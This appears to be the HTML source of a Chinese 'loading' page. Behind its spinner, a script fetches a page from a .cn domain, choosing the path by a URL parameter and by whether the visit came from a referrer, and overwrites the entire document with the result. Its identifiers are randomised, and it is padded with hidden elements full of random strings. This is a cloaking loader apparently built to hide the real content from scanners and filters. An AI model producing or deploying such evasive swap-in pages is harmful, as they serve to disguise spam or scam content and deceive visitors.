<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .v6eae6oAsa {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .v6eae6oAsa .osfMA8Fi {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .v6eae6oAsa .content {
            line-height: 50px;
            text-align: center
        }

        .v6eae6oAsa .img {
            width: 100%
        }

        .v6eae6oAsa .lSgz0m01J9 {
            text-align: center
        }

        .v6eae6oAsa .lSgz0m01J9 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .v6eae6oAsa .lSgz0m01J9 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .v6eae6oAsa .lSgz0m01J9 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .v6eae6oAsa .lSgz0m01J9 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .v6eae6oAsa .lSgz0m01J9 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .v6eae6oAsa .lSgz0m01J9 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .v6eae6oAsa .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UjTHkWdVLq(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var r8M491F = UjTHkWdVLq('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ r8M491F +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ r8M491F +".html?a=share";
		}
		
        G5HFHQ9US=url+"#"+new Date().getTime();
        G5HFHQ9US && function() {
            $.get(G5HFHQ9US, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<h1 style='display:none' >lmDiB2HjXeVWaoN6ntbwZRui6AR9MbZX1xQbnfA1ZA6TKLnyGZZCYpmi7KW</h1>
<p  style='display:none'>WIA2chJMoLAR6quD7f5IqFN2L5WmyBn</p>
<a  href='#' style='display:none'>WWuotlTqgN1F1KGM6d5Muq</a>
<b style='display:none' >waQDPbFOQuppzyronxsK2OIzmtaufO98K52dTFfyQ1urpYRT0wa3xImgB3XBIpQc64</b>
<h1 style='display:none' >lmDiB2HjXeVWaoN6ntbwZRui6AR9MbZX1xQbnfA1ZA6TKLnyGZZCYpmi7KW</h1>
<li style='display:none' >bioUl7VTMdx6kDpgtHdpkbTRLCByRKemR38a4jHxKId2MQpJLRAq9Q9Jt51AsdOud</li>
<p  style='display:none'>WIA2chJMoLAR6quD7f5IqFN2L5WmyBn</p><div class="v6eae6oAsa">
    <div class="osfMA8Fi">
        <div class="lSgz0m01J9">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>OsK0wDWQ5A2kTZcLcEXoiB</a>
<p  style='display:none'>gxWM5HyuDeFEhqigylVeeSfQqAITs2z9TznjyCDcM2N9VDewHuhFAvfOmqyguRd7aZKFLpau6TzfZeAgn5JPV3RozHlYwI6J</p>
<span style='display:none'>dTQ6cvZip7hQ1hRNKAXviixmZdpDOomnKtgagkUqILg5EjNcEVpQI0xzYGhdwAoBMoaOFC0TcGVdWyAsJnZoxZJT6sffb09HhJU</span>
<b style='display:none' >mHHOJ0dY16z9NTqHKtz7lODFHcSNmEUN1CxG3eOTkAqmNhAg</b></body>
</html>